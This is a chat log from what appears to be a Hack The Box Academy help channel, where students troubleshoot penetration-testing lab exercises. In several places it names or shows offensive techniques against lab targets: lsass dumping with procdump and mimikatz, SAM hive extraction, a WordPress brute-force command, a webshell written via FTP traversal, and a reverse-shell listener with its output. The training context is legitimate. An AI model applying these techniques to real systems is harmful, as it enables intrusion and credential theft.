3. It is the best that you try to understand what every options (flag) does in the command.

Later you can use search function in the note taking app for quick reference in the future.

Extra tips: You can always reference to man page for commands in Linux. Or even do a Google search, or asked AI for more information, which let u understand more about what a command does in details.

I think also it would help alot if you were to use practical labs from the Academy x HTB Labs and do one machine when you have finished a module and then you can make connections to a scenario. When I started doing that I wish I did it sooner tbh because I had all this theory and some good practical knowledge but in a different scenario I got a bit lost.

Anyone can help me in trust attacks skill assessment Q3?

Hi guys on Pivoting path, Chisel section do i need to downgrade the go version??

[★]$ go build go: errors parsing go.mod: /home/htb-ac-1152543/chisel/go.mod:3: invalid go version '1.25.1': must match format 1.23

[★]$ go version go version go1.19.8 linux/amd64

Why not just download a pre-compiled version? for linux it's in the gz one and for windows it's in the zip, keep in mind the architecture and os.
https://github.com/jpillora/chisel/releases/tag/v1.11.3

Hello everyone I’m very new here and I just had a quick question that has been torturing me for the past 3 days lol. I’m on the windows privilege escalation module in the SeDebugPrivileges section and after rdping into Jordan’s account and running cmd as admin it’s giving me an access denied whenever I try to make a dump file. I’ve already tried to change my privileges through the local policy settings but I don’t have access to that either. Any help would be really appreciated.

If you are trying to run command prompt/powershell as an admin and you submit the password, it would work

Thank you. Tried upgrading it but threw error so I will try this

I already tried running it as admin and putting the password in. It still just says that the Sedebugprivilege is ‘disabled’ and whenever I try to procdump lsass.exe it shows an error and says access denied.

I have just tested the exercise and managed to get the NTLM hash by dumping the lsass process using procdump and mimikatz

Currently doing the "Living of the Land" section within the "Active Directory Enumeration & Attacks" module, but I feel like the provided machines don't always fit the sections, like its not letting me downgrade powershell due to the right version of .NET not being installed, I also can't check the firewall with the provided commands. getting so many errors while trying to follow the given commands and instructions

Not everything shown in the section can be applied to the scenario presented by the questions/exercises

help

Can I ask what you did step by step leading up to dumping lsass with mimikatz? Maybe see what I’m doing wrong

the step of running a command prompt as an admin

Hello, guys i have a doubt in the module "Information gathering - Web Edition " and the section is "Virtual host". So i stuck in the questions , I stuck in brute forcing on ip to get the subdomains , i simply use gobuster with the given command and run it ,but it is not working, can any one tell me the right approach. I use this command [ gobuster vhost -u <Ip address: portNumber> -w <worldlist> --append-domain

Also i use subdomain-top1miilion110000.txt

Hey folks,
This might be a stupid question, but I'd rather be safe than sorry.
In the HTB Academy's "Information Gathering - Web Edition" module, specifically the "Subdomain Bruteforcing" section, the question for the cube is: "Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com."
However, inlanefreight.com is a live website on the world wide web, and there is no VPN for this challenge. Am I supposed to brute-force this website outside of the HTB environment?

Have you verified whether or not you can write files to the directory you are currently in

I don’t think so. I’m not at my computer right now but I did check my privs and the debug privilege was disabled so I figured that was where the error was coming from

Hi everyone, dumping is the phase when i use reg.exe to save the HKLM hives or the phase when i use secretsdump to decrypt the hashes?

The user does not have permission

Yes, inlanefreight.com is hosted by HackTheBox so you can just bruteforce the subdomains

Yes

saving the HKLM hives, using secretsdump to decrypt the hashes is cracking

So there is an error in "Attacking SAM, SYSTEM, and SECURITY" section, because there is written "One particularly useful tool for dumping hashes offline is Impacket's secretsdump."

I might be wrong

Dumping hashes offline is not the same as decrypting them

Copilot says dumping = reg.exe, decrtypting = using secretsdump as well

okay cool. thanks for answering 🙂

thanks for the help. ill do just that .)

someone?

Of course! lmk if you need help with the actual excersize part!

Thanks, I appreciate your help.!

echo 94.237.120.230 mail.smtpinjection.htb >> %SystemRoot%\System32\drivers\etc\hosts

ipconfig /flushdns

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

This site can’t be reached
mail.smtpinjection.htb refused to connect.

@earnest jacinth

can you do nslookup mail.smtpinjection.htb ?

nslookup mail.smtpinjection.htb
Server: UnKnown
Address: fe80::1

*** UnKnown can't find mail.smtpinjection.htb: No response from server

can you show output of type C:\Windows\System32\drivers\etc\hosts

That looks like a Docker container. This means that the machine is only available on the specified port.

C:\Windows\System32>type C:\Windows\System32\drivers\etc\hosts
94.237.120.230 mail.smtpinjection.htb

its actually there but when trying to acces it from browser connection refusing

The IP suggests it is a docker container, when you are visiting the website are you supplying the port as well?

You must access the page as follows
http(s)://mail.smtpinjection.htb:<PORT>

there is no port specified on which one is target. there are only vhost in lab

how to know on which port there is lab

It is provided with the IP address you have obtained by spawning the target

Thanks

CBBH - Web Fuzzing Section 6 - Virtual Host and Subdomain Fuzzing

Hey guys, not a question from a question but I just followed the course and set up :
echo "myboxIP inlanefreight.htb" | sudo tee -a /etc/hosts
Then proceeded withe the course but i get the following error :

curl: (7) Failed to connect to inlanefreight.htb port 81 after 18 ms: Couldn't connect to server

I tried to restart the target twice, restart the box once, I didn't put IP:PORT in my hosts file so I don't really know wht coul happen here, I use the PWNBOX

You need to put the port in your curl command

I did ?

From the error message it seems it tried to connect to port 81

oh okay so it's not a set port from the course

I have to use the target port

yup

Ok yeah, sorry the course material got me confused a lil bit since usually placeholder are used

thanks

Where do I find the target IP address on an Academy module (the Metasploit one)?

There's a VPN Servers section offering a download for a VPN connection file. Then I've got the Pwnbox which has spun up and I'm on. But there's no details on the target IP

Within the questions there is a distinctive text that goes Click here to spawn the target system!

I did that and the Pwnbox appeared

Pwnbox and the target are two different things

In the place of the Spawn Target (1 / 1) this Pwnbox appeared

Scroll down a bit in the page and you will spot it

the green bit of text "Click here to spawn the target system"

🙃

My bad, thank you

Are you using OpenVPN or pwnbox?

Pwnbox, I just thought from the look of what happened that I spawned the target instance, and the Pwnbox was appering in it's place, but non-paying academy users get 1 Pwnbox spawn per day?

Believe so yes, so I would recommend connecting using OpenVPN instead.

Coolio will do, got a Kali Linux laptop in the wings

Best practice is VM's or clean installs since certain configs or downloads you need to perform during Academy could mess up the system.

Or regular backups

Hello, guys i have a doubt in the module "Information gathering - Web Edition " and the section is "Virtual host". So i stuck in the questions , I stuck in brute forcing on ip to get the subdomains , i simply use gobuster with the given command and run it ,but it is not working, can any one tell me the right approach. I use this command [ gobuster vhost -u <Ip address: portNumber> -w <worldlist> --append-domain

Also i use subdomain-top1miilion110000.txt

Hello I'm new here
And I need help in how to start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Are you connected to the VPN?

Ya

I also tried in pwnbox

can you ping the IP?

to see if its up

Ya host is alive

port 80 or 443 is open I assume

Nope the port is given along with the ip

Ahh

try ffuf -u http://ip:port -w path/to/wordlist -H "Host: FUZZ.ip:port"

to see if it works with a different tool

Does, nt working i just run the above command exactly just replace the ip and port number along with the path

Did you add the vhost to your /etc/hosts file

It tells you what vhost is needed for the question

No , I saw this in youtube but did not understand why we do this

The server selects which site to serve based on the hostname in the Host header, so that must match the vhost configs. Add the host to your /etc/hosts file then you can use the host in place of the IP in your commands and it should work

i thought i need to edit the hosts file beacuse that host is unreacheable by public DNSs

Yeah, adding it to /etc/hosts makes the hostname resolvable locally. I'm commenting on why that's necessary for vhost fuzzing specifically

Because you could access the host via the IP:PORT if you wanted to

Hey there, again technical issues? I am spawning an XSS target and it doesn't seem to be reachable ip wise. first hop is the tunnel gateway and than it dies

dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a

hi, what is the difference?

one is the user, one is the machine... it's really that simple

ok but can u be more specific?

Hi there I need help in SQLI Skill assessment if anyone will help me

Hi i am trying to do the Skill Assessment for the module hacking wordpress and I am stuck on the first question of finding the wordpress version, I have ran multiple difficult commands and have been all over the webpage to try find a page that has wp enabled or something, even resorted to google and ChatGPT to help, yet still no success. Was wondering if it's just me if I am doing something wrong.

I've ran
wpscan --url <url>

this says the url is live but isn't running WordPress,

curl -s -X GET <url>| grep '<meta name="generator"'

returns blank, and other methods provided by ChatGPT don't work either.

Could someone help me out please?
please tag in replies

Anyone who recently did the "Attacking Wpa3 networks"?
Can't crack the password for the module Sae downgrade attack

hey stuck in the skill assessment of module called network foundation

it is from the optional task the question is:

I did nc <ip address> 21 - means initiated the FTP protocol

then ran logged in it anonymously and then and changed the mode of the FTP into Passive mode

and got the result put I don't know on which port I should connect to the FTP server for data connection
like how to figure out the port number I just got (number, number, number, number ...) this result

I also did the p1*256+p2 still didn't able to connect

please help

"DPAPI (Data Protection Application Programming Interface) is a set of APIs in Windows operating systems used to encrypt and decrypt user credentials employed to interact with third-party services (such as websites, applications, networks, etc.). The user key is used when the process that needs to store the credentials runs in user context. For example, it is used to encrypt the Credential Locker, which is the secure container used when a native Windows application accesses a remote service and stores user credentials via Credential Manager. (This is different from cookies, which are always used when the user accesses a website directly through a browser—they are stored locally and are not encrypted by default.) The machine key, on the other hand, is used when the process storing the credentials runs in system context, such as under the SYSTEM account." correct?

so you set up a listener on the p1*256+p2? otherwise just use the ftp tool

Module: AD Enum & Attacks
Section: Skill Assessment Part 2

A hint for Q7

Submit flag under Administrator on SQL01

Tried password hunting etc but I’m stuck i feel like it’s something to do with the ||impersonation|| priv but I can’t ||impersonate|| anyone ? Any help would be appreciated 😁

Edit: nvm a google search on the priv revealed what to do, hopefully it works

Module: Hacking WordPress
Section: Attacking WordPress Users
Question: "Perform a bruteforce attack against the user "roger" on your target with the wordlist "rockyou.txt". Submit the user's password as the answer."

I am running what I think is the right command (wpscan --password-attack xmlrpc -U roger -P /usr/share/wordlists/rockyou.txt --url http://IP:PORT -t 20), and wpscan does its initial thing with finding plugins and the like, but it keeps timing out on the pw scan itself. I have tried it with different wordlists and usernames. Am I missing something, or is the machine wonky?

Hello, can someone explain me this?

Hello, Attacking Common Applications --> Attacking Drupal. Cannot conduct a drupalgeddon3 attack because the server returns internal server error 500 after each try. The initial ruby module was downloaded from github, since it's not by default on metasploit. Also does not work from htb hacking instance. I have tried debugging, doing the exploit manually and it magically removes the part with the payload, throwing an error. Anyone had this?

Hello! I am on the attacking common applications module on attacking drupla and I try to use the drupalgeddon3 exploit as mentioned in the course but for some reason it does not seem to work . Did anyone try that and was successful?

I did

Hello from Reddit 👌

Also in attacking common applications , attacking tomcat , The multi/http/tomcat_mgr_upload Metasploit module which is mentioned it the course , did not work . The manual method worked though . Anyone has any ideas ?

i second this .

???

Hey everyone! Just curious if this is only me, but in the NFS module for Footprinting, there's no /etc/exports file in pwnbox, meaning I'm unable to configure NFS at all. Any suggestions?

I'm able to footprint the service still thankfully, but as for connecting to and enumerating the service for the flag, I can't do that

don't worry about the configuration aspect

with mount just use sudo with it to get it to mount properly

@sterile solstice did you get the answer? I have the same problem

About the os version that delivers winPEAS in the Module: Windows System Enumeration, i tried several answers and none of them work 🙁

Thank you!

can any body help, I am getting connection refused even after putting the right port after calculating p1*256+p2

can anyone help with Skills Assessment - SQL Injection Fundamentals i am stuck, i am trying to inject sql code on invitationcode but it does not seem to work, any hints from the folks?

What submodule of sql injection? Union Clause?

Question on Web Attacks | Advanced File Disclosure

I was able to get the flag using the CDATA method, but I can't seem to do it with the Error-Based one. I can't seem to get the error to pop, but I'm unsure if I'm doing something wrong. Anyone have a second to lend a hand?

Can anyone help me understand what is going on here?

--skip-ssl

thank you

You're welcome

Yeah I can't seem to get the error-based to work, if anyone gets a hand to lend, @ me please

I'm working through the Attacking Common Services the Easy Lab. I'm struggling to find a login/password, tried using smtp-user-enum with VRFY & RCPT and many of the SecLists username lists. Am I going about this wrong? I notice the FTP version of the target is vulnerable to the CVE in the Latest FTP Vulnerabilities section, but I need a login for that

There's a userlist you can download at the top under Resources

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

Thank you

Yep 😂 I never checked that too until then.

I guess I like working harder than I need to.

I have a question:
Recently I asked about is there any way to connect to the windows machine terminal instead of using slow rdp. I have low user so can not use winrm and ssh is disabled..
I have tried dropping a payload for shell But i am not getting connection back I have used correct ip and everyhing any walkthrough?

Curious, I'm thinking about doing a subscription to get the answers when I get stuck and to get CPEs. What are the step-by-step solutions like? For example, does it just show all of the steps or one at a time as I need help? Basically I still want to push myself and not just run through the exercises

U completed it? If not dm me I will help

Hi the vpn in priv esc skills assesment doesnt work

Windows priv esc module*

Its pretty much a step by step that you scroll through with command/output then a sentence describing what you have to do next. You can scroll to the end to see the flag most of the time but that defeats the purpose imo.

Sweet, thank you for your help! I'll probably sign up mainly for the CPE submission

Any Docker gurus around? I'm doing the Parameter Logic Bugs module, am able to build and run the provided container for the first exercise, which exposes port 5000. However, I'm unable to reach that from my browser. I checked docker ps and it does look like 0.0.0.0:5000 is exposed properly.

(PS: the bridge seems to be set up properly, and I've tried hitting the public IP of the container as well but it didn't work)

Nevermind, turns out it's an issue with bcrypt, and the application didn't even fully load in the container: Error: /app/node_modules/bcrypt/lib/binding/napi-v3/bcrypt_lib.node: cannot change memory protections

Any nodejs peeps out there who can help?

Hey guys so ive been going through the Active Directory Enumeration and attacks module, and in the section Privelaged Access i used the bloodhound ingestor to get the info, and i inserted it into my own bloodhound in my linux attack host, but whenever i run the query to find the users with CanPsRemote it kept giving no results whatsoever, but when i tried the bloodhound given in the C:\Tools which is given when you rdp into the box, it worked fine.

does anyone have an idea why, and how can i overcome this?

It's back to a networking issue. I rebuilt bcrypt and the application does run without crashing, but it's still unreachable from the host. It says [web app]: Web app is running at http://localhost:5000/ but my browser is still unable to connect

sorry i can't remember what msg you replied to lol. if its winPEAS, best to try a few different versions if it doesnt work. like the x64 and x86, but also the .bat or .exe versions

Hey there, is anyone else having issues accessing a path within HTB? I am trying to get into enterprise section of HTB to continue learning for CPTS but since yesterday I have received the following message: 'We are facing "Failed to fetch sections" error when trying to access a path.'

It looks like this is a known issue, but I'm unable to speak to anyone right now due to the time to provide any further feedback, sorry. Could you please raise a support case regarding this? I'll drop a message internally too.

A fix is being worked on, as stated in the banner on EP at the moment. Apologies for the inconvenience caused.

Why can't I connect? Did I make a mistake somewhere in my command? (Just to clarify, I did activate the target.)

Which module / section are you working on?

I'm working on the SQL foundations at the "service and process management" stage.

That section is in the Linux Fundamentals module, just FYI

yeah exactly

You said SQL Foundations

Anyway, it doesn't matter

mb mistake

np np

You have the username incorrect

It's htb-student, not htb_student

oohh 😅

ty xD

😄 np

hi there, I got some troubles to connect target in lab: https://academy.hackthebox.com/module/268/section/3060
this IP target I got is 94.237.53.126:37485 but I can not access this target via browser

I need a guide in my with HTB please anyone

If you see in the module, the endpoint is /swagger, try adding that to the URL. http://94.237.53.126:37485/swagger

Best to just say which module/section/question you're on and ask your question

How can I setup workingstation

https://academy.hackthebox.com/course/preview/getting-started for a guide for Academy and the process in general

To setup a workstation, depends upon your chosen distribution, for example

https://parrotsec.org/docs/virtualization/install-parrot-on-virtualbox/

is there a specified endpoint for the question?

404 -> not found is not the same as we no route to host; which would be a vastly different error

Any ideas ? Anyone ?

I am working through the AD enumeration & attacks module and I am stuck on the DCSync part. I can only connect to one of the machines (MS01) in the section and not the attack host.

Please no disrespect

I don't understand this question:

To get the flag, start the about exercise, then use cURL to download the file return by '/download.php' in the server shown above

Read the module and secion content, it will have explained how to use cURL. What have you tried? Which module are you working on?

HTTP

whenever a web module references an endpoint like '/download.php' they are talking about it as if you were visiting the webpage and navigating to the 'download' page/function

so http://ip:port/download.php

I dont know how to setup my cURL

you don't have to set up curl...

you just curl <url>

This where I am currently

...

i just gave you the syntax

you don't run curl and THEN add the url

it's curl url

also your paste contains some control characteres (the 200~) so be mindful of that

Anyone know how to fix these errors on the sedebugprivilege on the windows esc module??

make sure to run debug::privilege in mimikatz

Do I do that before I procdump or after?

Thanks for answering btw

well it looks like procdump did its thing

but look at mimikatz, it literally gave you an error

which is where the problem lies

actually

nvm i know the problem

@glad sky you're using the 32 bit mimikatz, not 64 bit

i just peeped the title bar

Ohhhhh Idk how I fucked that up honestly lol

Thanks man I’ll let you know how it goes

Still don't get what going on

curl http://ip:port/download.php

Sorry to say
Am new on this I don't really understand what you are saying if you can please break it down for me

.... i'm not sure how much more you need it broken down

ip:port is the ip and port that the module gives you

Ok

Still don't understand dude

curl is a command you use in the terminal, you can use man curl to find out more about the command. the url, http//ip:port/download.php is a representation of the website and endpoint you're having curl connect to. ip is the ip address, port is the port.

AD Enumeration & Attacks - Skills Assessment Part II
Q) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

now that i have the credentials to mssql of a privileged user and want to get a shell i used the reverse shell powershell cmd, but its too long and then i planned to send a payload but it says cannot execute this particular file (so probably security policies is causing issue), so then i tried to get a hash back of spn via responder that did not work either , the responder is not being triggred .. help ?

thanks NutsGPT ❤️

...

you just asked, no need to bump when it's still on screen

did you try dumping things?

dump from where i dont have access to anything other then mssql

just to make sure i understand; do you have the ms* password? if so, try reusing it for other services

i have the creds of net** which i did retrieve from the config file

ahhh ok; xp_cmdshell is your next step

yup...

consider privileges you may have and tools you may be able to use to impersonate an admin

shouldn't catching the hash with responder of the spn work ? or running a payload which will give me a shell back ?

that's all well and good, but the shell would only have the privileges of the user you have... unless you impersonate

If you have the Sedebugprivilege you can use procdump and mimikatz

so ultimately i gotta do privilege escalation in mssql itself (or i can also impersonate someone)?

there is an Se privilege, but it's not for procdump or mimikatz

they are before the dump stage :) i just didn't know where they were at

there's something you can do to SPOOF your user 😉 😉 😉

I suggest going over your notes to see where you might be able to understand what I mean

note that the tool isn't explicitly showcased in the module, but it is mentioned alongside some taters

i know what u mean , i was so fixated on getting a shell back or catching the hash via responder i did not think about that ..

Yo my bad if these are bad questions but I just started my journey and am doing this module but I cannot answer these 2 questions I am wondering if you guys know the answers: Question 1: What type of network cable is used to transmit data over long distances with minimal signal loss? Question 2: Which protocol manages data routing and delivery across networks?

1. the format is a-b (and not the word cables)
2. xyz/ab this is explicitly in the reading

but im still little confused y was i not able to catch the hash ...

¯_(ツ)_/¯

likely just not broadcasting

Thanks for letting me know I just didn't understand the formatting of the questions. Also sorry but I don't understand the first point you made.

it's just expecting a-b

it's not expecting the word cable(s)

like cat-5 instead of cat-5 cables

I see, thank you very much for the help. I appreciate it.

How can I setup my own workstation

https://academy.hackthebox.com/course/preview/setting-up; each OS has their own documentation for installing as well

Have someone complete the interaction with users for this Windows Privilege Escalation module?

about the module of Android Penetration Testing Automation

the error message alway happen on pip3 install frida==16.7.17 frida-tools==13.7.1, the error message in chap Objection and Medusa - Bypassing Security Mechanisms

Traceback (most recent call last):
  File "/home/kali/Android/auto/Objection/objection-venv/bin/objection", line 8, in <module>
    sys.exit(cli())
             ^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1462, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1383, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1850, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1246, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 814, in invoke
    return callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/objection/console/cli.py", line 114, in explore
    agent.inject()
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/objection/utils/agent.py", line 202, in inject
    session = self.get_session()
              ^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/objection/utils/agent.py", line 166, in get_session
    self.spawned_pid = self.device.spawn(state_connection.gadget_name)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/frida/core.py", line 86, in wrapper
    return f(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/frida/core.py", line 1029, in spawn
    return self._impl.spawn(program, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
frida.ProcessNotFoundError: unable to find process with name 'system_server'

(emulator-5554) medusa➤run -f com.hackthebox.myapp
[2025-11-07 17:08:42,099 - ERROR] -  An error occurred while attempting to start the requested package: unable to find process with name 'system_server'. Retrying with monkey command...
...

plz help, thx

i am stuck at CRUD API, i followed the following requirements but the flag won't appear :" First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag."

ok find my error sry

Hi

Can someone help me? My question is: how do I find a writable shared folder?

can anyone help with skill assessment of sql injection Fundamentals? i bypassed login page but i dont know what to do next

Yes, I unload the same version of frida-server to AVD, and this error happen

The team shipped a fix for this just now, so hopefully you should be all good to go now 🙂

intro to bash question Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

34070
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
808B9B4EB27F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:providers/implementations/ciphers/ciphercommon_block.c:107:

it gives me the error

@amber rose remove that content which spoils portion of a Tier 1 module please.

You can ask for aid without pasting the whole damn section exercise

mb

Thank you

fine now ?

i wanted to know if my answer was wrong

I understand, but someone may be able to help in DMs to avoid spoiling module content that is over Tier 0 🙂

alright

Hello, Attacking Common Applications --> Attacking Drupal. Cannot conduct a drupalgeddon3 attack because the server returns internal server error 500 after each try. The initial ruby module was downloaded from github, since it's not by default on metasploit. Also does not work from htb hacking instance. I have tried debugging, doing the exploit manually and it magically removes the part with the payload, throwing an error. Anyone had this?

hi

link in web attacks in Mass IDOR Enumeration very very slow

I am doing the SOC Analyst job role path, and this first module is more like a conceptual framework rather than anything practical, how am I supposed to study this? Idk maybe this is a weird question to begin with, but it currently feels like passive reading, is this wrong?

Hello,
is there a problem with Academy ? i can't ping the target IP in my local account but even too on the attack box
It's just the Reverse & payload module
https://academy.hackthebox.com/module/115/section/1106
I tried an another module, and was able to ping the target.

Switch to a US vpn works better imo

I mean you do need a rough knowledge of basics

Anyone who recently did the "Attacking Wpa3 networks"?
Can't crack the password for the module Sae downgrade attack

Anyone able to give a nudge on Web Attacks | Skills Assessment? I can't seem to figure out how to grab the admin

I've ran an IDOR script to pull info from all users, but there's no indication of admin as well

I'm working through the Easy Lab for Attacking Common Services. I found the username and password, discovered I have access to FTP and MySQL db, but not seeing much in either. The account doesn't appear to have RDP or SMTP access, so I've hit a wall. Any hints?

I also tried setting up web shells, using evil-winrm trying to get a CLI on the target with no success

anyone able to give me a nudge on the footprinting lab medium (cant seem to find a foothold)?

Which one there is 3 labs so you want hint for the medium one or the other one

For the medium one

Ok now i assume you did the nmap scan so just analyze it properly see if there any service you see which you encounterd before in the module

.

I am stuck on PRTG module on attacking common applications . I can’t login using the dangle credentials prtgadmin:prtgadmin

Update to this - found admin user - but can't seem to change their PW even after getting a 200 OK in Burp..?

Hey all. Uhm, can someone help me with a sanity check please? I'm on the skills assessment of the Password Attacks module

I'm ssh'd to the jumpbox with -D to have a proxy via the jumpbox. But I just can't figure out why commands run with proxychains isn't being forwarded.

thank you

I can't give you any help with using ssh -D but ligolo worked flawlessly for me

Oh boy, that's a whole new topic for me (ligolo). Will stick a pin in that and have a look later. Thanks for the idea. I'm determined to figure out proxychains first

Trust, Ligolo is a much better proxy option, I haven't used proxychains since Ligolo

Agree 100%

so I have finally returned, but things are not going well. I am in "Linux Fundementals" module: "working with files and directories". It's asked me to use "tree" but it does not exist on the spawn, so i used READ LINK -F. not a big deal, but its the questions at the end.
first: What is the name of the last modified file in the "/var/backups" directory? Answer: "alternatives.tar.0" but says that is wrong.

second question: What is the inode number of the "shadow.bak" file in the "/var/backups" directory? accept this file does not exist in the pawnbox. are these lesson way outdated to changes made in the system or the more probable answer, i am stupid.

Ok, I can see the appeal, straight forward tunnel setup 🤔 thanks for the suggest.

You're welcome

Does anyone have working steps to recompile the .jar file for the "Attacking Web Thick Clients" from the module Attacking Common Applications?

Can I DM you about this?

https://0xdf.gitlab.io/2020/08/08/jar-files-analysis-and-modifications.html#modifying-compiled-classes
https://0xdf.gitlab.io/2020/08/08/htb-fatty.html

Can anyone help me in trust attacks skill assessment Q3?

Is there a issue with the servers currently? My RDP connection keeps dying. I can't even pull the .jar file onto my impacket smbshare (fails with network error). Already switched VPN twice and on my 10th box reset

i'm not staff so i wouldn't have knowledge of any infra issues; https://status.hackthebox.com is a good place to check if you're unsure if there's issues

I'm working through the Easy Lab for Attacking Common Services. I found the username and password, discovered I have access to FTP and MySQL db, but not seeing much in either. The account doesn't appear to have RDP or SMTP access, so I've hit a wall. I also tried setting up web shells and using evil-winrm try to get a CLI on the target with no success. Any hints?

writing files is handy, just be wary of / direction

Yeah, I did the FTP vulnerability, but not sure where that's going to get me

the vulernability allows you to traverse when writing files; curl can be used for more than http you know

Right, but traversing to write a file is different than directory traversal in the address bar where I can see what's in directories. I know curl can be used for more, but I'm missing the connection you're referring to

you don't need to read the files, you can write a webshell 😉

I tried that, it just allowed me to download the aspx instead of execute it

the file in ftp tells you where the webroot is

why are you trying to write an aspx file? maybe php will do. don't overcomplicate things

I used the aspx before, so figured I would repeat it, but I know php is on there. I'll give that a go, thank you!

Can I get a nudge for the web attacks | SA I can't seem to find the xxe - I've tried all of the methods, but I can't get anything

the admin has access to an interesting feature

yeah I'm in admin - I have the xxe injection point, I just can't get anything to work

a filter should do the trick

Interesting I'll have to try again then - tried before and couldn't get anything

Yeah I just get ... '' has been created

Yeah - none of these requests are even hitting my server

idk guess i'll table it for a while

Hey Marcie I switched mimikatz.exe to x64 and it’s still showing the same issue.

If anyone ever needs help with the "LLM Output Attacks Skills Assessment," DMs are open, though it may take up to 24 hours for a response.

Marcie it fucking worked ill never doubt you again big bro 🫡

Im stuck .
In win priv esc module skills assesment I
Can I get any help?
I tried to use juicypotato vulnerabilty but i cant have rev shell

I ran grep about adb shell friday process to check before, but no mind, I’ll try again tonight and let you know then. thx

Hey @fathom pendant , I'm getting errors trying to use the laudanum shell.php and reverse-shell.php. Any ideas?

shell.php - Error in Browser
Parse error: syntax error, unexpected '$allowed' (T_VARIABLE) in C:\xampp\htdocs\shell.php on line 56

reverse-shell.php - Error in Listener
┌──(stinger㉿kali)-[/usr/share/laudanum/php]
└─$ sudo nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.17.142] from (UNKNOWN) [10.129.203.7] 49679
'uname' is not recognized as an internal or external command,
operable program or batch file.

Looks like it's working to me. It just can't find that command, uname. Think about why you think that may be. There's a few clues in your post as to why.

Really? I'm not sure because I know the uname command works

Apparently it doesn't work, according to what you wrote. It says command not found.

Right, I mean outside of the script I can run uname with no issue

You ran the command just fine, it just couldn't find the command.

I'm not sure why that would be

It's because the command doesn't exist within the underlying host you're running the command on.

I wasnt aware uname was a windows command 😉

Gotcha, that makes sense

Back to the drawing board, but at least I know where to upload the shell. Thank you!

Maybe time to go to bed 😀

Hello

Can someone explain the problem here for me

-o signifies output, meaning that you're saying the output file is http://ip:port/download.php

Is what

https://man7.org/linux/man-pages/man1/curl.1.html

take out the -o argument BEFORE the url

it's printed in the terminal @silver citrus look closely

you can also add -o download.php to the end of your curl command

You can even setup listening ports on the target directly from the proxy running on your attack hosts to forward packets to your attack host for reverse tunneling

And runs nmap fairly well

any idea what triggered this ?

no idea; could be terrible connection trying to reconnect

i had foxyproxy on and burp opend but didn't intercept anything does this have anything to do with this error message ?

Hi for AEN module, why does double pivot using ligolo drops after around minute?
Update: It was due to WINRM shell, I tried using smb one and it works fine

Hello guys CPTS Module (Attacking Common Applications > PRTG Network Monitor) Has no/missing pictures within . I tried refreshing , it is not a network issue

Also having this issue with modules on the CPTS path (Pivoting, Tunneling, and Port Forwarding). Restarting/updating my browser fixed this.
I also ran into an issue where I couldn't spin up an instance because a VPN key couldn't be generated. If this happens to you, relogging fixed it for me.

Ok thanks it worked

Hi there, i'm having an issue with the socond question of Android emulators on android fundamentals, this is the question: Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test). i found the build number --> UE1A.230829.036.A4 but the format doesn't makes sens and i didn't manage to find any other compatible build number. am i doing something wrong or am i searching in the wrong place?

Are the images from the module’s section not loading for anyone else ?

It just loads and then disappears for me. I’ve got no vpn nor proxies turned on

Edit: I forgot to read the previous messages 👍😊

Anyone completed GPO attacks module. I successfully abuse the privilege of gabriel but still not able get PSSession

Meusa - webservices lab issue in CWES learning path.

can someone please help me , about the Graphql module

hi, i do't know if someone of you had the same problem, im doing the module foundamentals of linux, and mostly of tasks, says me my answer it's wrong, i was checking and checking, and i didnt find the correct solution, i asked to chatgpt and it said that my answers was correct, anyone else had some similar problems?

Can anybody who has completed "osTicket" give me some hints please?

Hey Guys,

I'm at the Graphql Module from CWES Path and in "Information Disclosure" i found a flag after a query from users... But the flag doesnt accepting "Error
Incorrect answer!".. need help pls.

Port 22 isnt open

Use sample creds provided in the reading

Another example of chatGPT being confidently incorrect. One of the main reasons for incorrect answers in linux fundamentals is not being connected to the target.
Spawn instance spawns the in-browser pwnbox, theres a separate button for spawning the target which should be a 10.129.x.x ip

In the footprinting module, domain information section there is this command for dns resolution to see what all subdomains r live
in the output we have one aws result but in the command we have filtering for results containing the domain name

the result seems incorrect

thank you very much

